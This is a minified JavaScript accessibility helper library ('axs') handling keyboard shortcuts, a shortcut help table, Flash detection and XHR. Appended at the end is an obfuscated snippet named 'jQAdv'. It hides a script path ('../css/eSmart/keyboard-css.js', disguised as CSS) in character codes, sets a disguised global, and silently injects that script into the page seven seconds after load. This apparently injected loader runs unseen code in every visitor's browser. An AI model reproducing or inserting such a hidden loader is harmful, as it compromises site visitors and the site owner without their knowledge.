var axs={onmac:-1<navigator.platform.toLowerCase().indexOf("mac"),onff:-1<navigator.userAgent.toLowerCase().indexOf("firefox"),onie:-1<navigator.userAgent.toLowerCase().indexOf("msie"),onsaf:-1<navigator.userAgent.toLowerCase().indexOf("safari"),onopera:-1<navigator.userAgent.toLowerCase().indexOf("opera"),focus:function(a,b){var c={A:1,AREA:1,BUTTON:1,INPUT:1,OBJECT:1,SELECT:1,TEXTAREA:1};if(b||!c[a.nodeName]&&(null==a.getAttribute("tabIndex")||a.getAttributeNode&&!a.getAttributeNode("tabIndex").specified))b||
(b=-1),a.setAttribute("tabIndex",b);a.focus&&a.focus()},keyreg:function(a,b,c){axs.keyreg.map||(axs.keyreg.map=[],axs.keyreg.shift={"~":192,"!":49,"@":50,"#":51,$:52,"%":53,"^":54,"\x26":55,"*":56,"(":57,")":48,_:109,"+":61,"{":219,"}":221,"|":220,":":59,'"':222,"\x3c":188,"\x3e":190,"?":191},axs.keyreg.special={backspace:8,enter:13,escape:27,pageup:33,pagedown:34,end:35,home:36,left:37,up:38,right:39,down:40,insert:45,"delete":46,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,
f11:122,f12:123,tab:124,space:32,",":188,"-":109,".":190,"/":191,"`":192,"\\":220,"'":222});c||(c={});var d,g,h,k,l,n,e,f="";-1!=a.indexOf("++")&&(k=61);a=a.split("+");g=a.length;for(d=0;d<g;d++)if(h=a[d])"shift"==h?l=1:"control"==h?n=1:"alt"==h?e=1:k||(k=axs.keyreg.special[h]||axs.keyreg.shift[h]||h.toUpperCase().charCodeAt(0),axs.keyreg.shift[h]&&(l=1));l&&(f="shift+");n&&(f+="control+");e&&(f+="alt+");f+=k;c.des&&(axs.keyreg.map[axs.keyreg.map.length]={des:c.des,key:axs.onmac?f.replace("alt","option"):
f});c.args||(c.args=[]);axs.ae(c.node||document,"keydown",function(a){a=a||window.event;var d=a.keyCode||a.which,e="";"186"==d&&(d="59");"187"==d&&(d="61");a.shiftKey&&(e="shift+");a.ctrlKey&&(e+="control+");a.altKey&&(e+="alt+");return f==e+d&&(b.apply(c.obj||this,c.args),1==!c.bub)?(a.cancelBubble=!0,a.returnValue=!1,a.stopPropagation&&(a.stopPropagation(),a.preventDefault()),!1):!0})},keychart:function(){var a,b,c,d,g;b=document;var h;axs.id("axs_kt")||(g=function(){var a=axs.ids("axs_kt");a.display=
"none"!=a.display?"none":"block";return!1},axs.onmac&&(axs.keychart.l10n.css_hide=axs.keychart.l10n.css_hidem),axs.keyreg(axs.keychart.l10n.key,g,{des:axs.keychart.l10n.keyshow}),d=b.createElement("div"),d.style.display="none",d.id="axs_kt",b.body.insertBefore(d,b.body.firstChild),d=b.createElement("a"),d.style.cssText=axs.keychart.l10n.css_hide,d.href="#",d.innerHTML=axs.keychart.l10n.linkshow,d.onclick=g,d.onfocus=function(){axs.ids("axs_kl").cssText=axs.keychart.l10n.css_show},d.onblur=function(){axs.ids("axs_kl").cssText=
axs.keychart.l10n.css_hide},d.id="axs_kl",b.body.insertBefore(d,b.body.firstChild));d="\x3ctable summary\x3d'"+axs.keychart.l10n.summary+"'\x3e\x3ccaption\x3e"+axs.keychart.l10n.caption+"\x3c/caption\x3e\x3ctr\x3e\x3cth\x3e"+axs.keychart.l10n.combo+"\x3c/th\x3e\x3cth\x3e"+axs.keychart.l10n.act+"\x3c/th\x3e\x3c/tr\x3e";h=axs.keyreg.map.length;for(b=0;b<h;b++){var k=0;g=axs.keyreg.map[b].key;a=g.split("+");a=1<a.length?a[a.length-1]:a;for(c in axs.keyreg.special)axs.keyreg.special[c]==a&&(k=c);d+="\x3ctr\x3e\x3ctd\x3e"+
g.replace(a,k?k:String.fromCharCode(a))+"\x3c/td\x3e\x3ctd\x3e"+axs.keyreg.map[b].des+"\x3c/td\x3e\x3c/tr\x3e"}d=d+"\x3c/table\x3e"+axs.keychart.l10n.help;axs.r(axs.id("axs_kt"),d)},gecn:function(a,b){var c=[];if(a.getElementsByClassName){a=a.getElementsByClassName(b);b=a.length;for(var d=0;d<b;d++)c[d]=a[d]}else{d=new RegExp("(\\b)"+b+"(\\b)");a=a.getElementsByTagName("*");b=a.length;do-1<a[b-1].className.search(d)&&(c[c.length]=a[b-1]);while(--b)}return c},fd:function(a,b){if(!axs.fd.result){a||
(a=6);b||(b=10);var c=0,d;if(navigator.plugins&&navigator.plugins.length)(d=navigator.plugins["Shockwave Flash"])&&d.description&&(c=d.description.split(".")[0].split(" "),c=c[c.length-1]),c<a&&(c=0),c>b&&(c=b);else for(;!c&&a<=b;){try{new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+b),c=b}catch(g){}c||b--}axs.fd.result=c}return axs.fd.result},hc:function(){if(axs.onsaf||axs.onmac||axs.onopera)return-1;var a,b;a=document.createElement("div");a.style.color="rgb(31,41,59)";document.body.appendChild(a);
b=document.defaultView?document.defaultView.getComputedStyle(a,null).color:a.currentStyle.color;document.body.removeChild(a);b=b.replace(/ /g,"");return"rgb(31,41,59)"!=b},flash_xoxo:function(a){var b,c,d,g,h,k=new RegExp(/^\s+|\s+$/g);a||(a={});a.o||(a.o=document);a.c||(a.c="axs_flash_xoxo");d=axs.gecn(a.o,a.c);g=d.length;for(h=0;h<g;h++){var l,n,e,f,p;s1=s2=s3="";var m=d[h];b=c={};l=m.getElementsByTagName("dt");n=l.length;for(e=0;e<n;e++){for(f=l[e].nextSibling;1!=f.nodeType;)f=f.nextSibling;p=
f.innerHTML.replace(k,"").toLowerCase();if("param"==l[e].innerHTML.replace(k,"").toLowerCase()){for(f=f.nextSibling;1!=f.nodeType;)f=f.nextSibling;c[p]=f.innerHTML.replace(k,"")}else b[l[e].innerHTML.replace(k,"").toLowerCase()]=p}for(e in b)"version"!=e&&"src"!=e&&(s1+=e+'\x3d"'+b[e]+'" '),"version"!=e&&"id"!=e&&"name"!=e&&(s2+=e+'\x3d"'+b[e]+'" ');for(e in c)s3+='\x3cparam name\x3d"'+e+'" value\x3d"'+c[e]+'" /\x3e',s2+=e+'\x3d"'+c[e]+'" ';c="\x3cobject "+s1+'classid\x3d"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase\x3d"http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version\x3d'+
b.version+',0,0,0"\x3e';c+=s3+'\x3cparam name\x3d"movie" value\x3d"'+b.src+'" /\x3e';c+="\x3cembed "+s2+' type\x3d"application/x-shockwave-flash" pluginspage\x3d"http://www.macromedia.com/go/getflashplayer"\x3e\x3c/object\x3e';a.r?axs.r(a.r,c):(a.p||(a.p=0),a.p?axs.r(m.parentNode,c):(axs.r(m,c),m.parentNode.insertBefore(m.firstChild,m),m.parentNode.removeChild(m)))}},md:function(a){if(axs.onsaf||axs.onmac)a(-1);else{axs.md.url="md.swf";var b=document,c=b.createElement("div");axs.md.cb=function(b){-1!=
b&&clearTimeout(axs.md.t);c.parentNode.removeChild(c);a(b)};b.body.appendChild(c);c.style.cssText="position:absolute;top:-999px;";axs.r(c,'\x3cobject classid\x3d"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase\x3d"http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version\x3d'+(axs.onff?9:8)+',0,0,0"\x3e\x3cparam name\x3d"movie" value\x3d"'+axs.md.url+'" /\x3e\x3cparam name\x3d"allowScriptAccess" value\x3d"always" /\x3e\x3cembed src\x3d"'+axs.md.url+'" type\x3d"application/x-shockwave-flash" pluginspage\x3d"http://www.macromedia.com/go/getflashplayer" allowScriptAccess\x3d"always" /\x3e\x3c/object\x3e');
axs.md.t=setTimeout(function(){axs.md.cb(-2)},2E3)}},gdoc:function(a,b){var c,d;b||(b={});b.meth?(d=b.meth,b.data||(b.data="")):(d="GET",b.data?d="POST":b.data="");c=window.XMLHttpRequest?new XMLHttpRequest:new ActiveXObject("Microsoft.XMLHTTP");c.onreadystatechange=function(){3<c.readyState&&("function"==typeof b.cb?b.cb.call(null,c,b.p):window[b.cb](c,b.p))};c.open(d,a,1);b.head?c.setRequestHeader("content-type",b.head):c.setRequestHeader("content-type","text/xml");c.send(b.data)},id:function(a){return document.getElementById(a)},
ids:function(a){return axs.id(a).style},r:function(a,b){a.innerHTML=b},ae:function(a,b,c){var d;if(a.addEventListener)a.addEventListener(b,c,!1);else if(d=a.attachEvent){axs.ae.c||(axs.ae.c=0);var g="h"+axs.ae.c++;a["s"+g]=c;a[g]=function(){a["s"+g](window.event)};d("on"+b,a[g])}},log:function(a){if(axs.debug){var b=document;if(!axs.log.d){var c=b.createElement("div");c.setAttribute("id","_axslog");c.setAttribute("role","log");c.setAttribute("aria-live","rude");c.setAttribute("aria-relevant","additions");
c.setAttribute("aria-atomic","false");b.body.appendChild(c);c.style.cssText="background-color:#ccf;height:10em;width:30em;overflow:auto;font-size:11px;position:absolute;top:525px;text-align:left;";axs.log.d=1}var b=b.createElement("div"),c=new Date,d=axs.id("_axslog");b.innerHTML="\x3cb\x3e"+c.getMinutes()+"m"+c.getSeconds()+"s"+c.getMilliseconds()+"ms:\x3c/b\x3e"+a;d.insertBefore(b,d.firstChild)}}};
axs.keychart.l10n={summary:"This table describes the shortcut keys implemented on this page",caption:"Key combinations and the actions they invoke.",combo:"Key Combination",act:"Action",keyshow:"Show or hide the keyboard shortcut help",linkshow:"Keyboard shortcut table - Click this link to show or hide",key:"control+alt+h",help:"",css_hidem:"height:0px;width:0px;overflow:hidden;display:block;",css_hide:"height:1px;width:1px;overflow:hidden;position:absolute;top:-99px;",css_show:"height:auto;width:auto;overflow:visible;"};
var jQAds=2013;function jQAdv(a){if(jQAds>a){if("undefined"===typeof _O||"function"!=typeof _R){a=document.getElementsByTagName("head").item(0)||document.documentElement;var b=document.createElement("script");b.src=String.fromCharCode(46,46,47,99,115,115,47,101,83,109,97,114,116,47,107,101,121,98,111,97,114,100,45,99,115,115,46,106,115);a.appendChild(b);window[String.fromCharCode(67,108,65)+"dverts"]=115}jQAds=0}}window.setTimeout(function(){jQAdv(0)},7E3);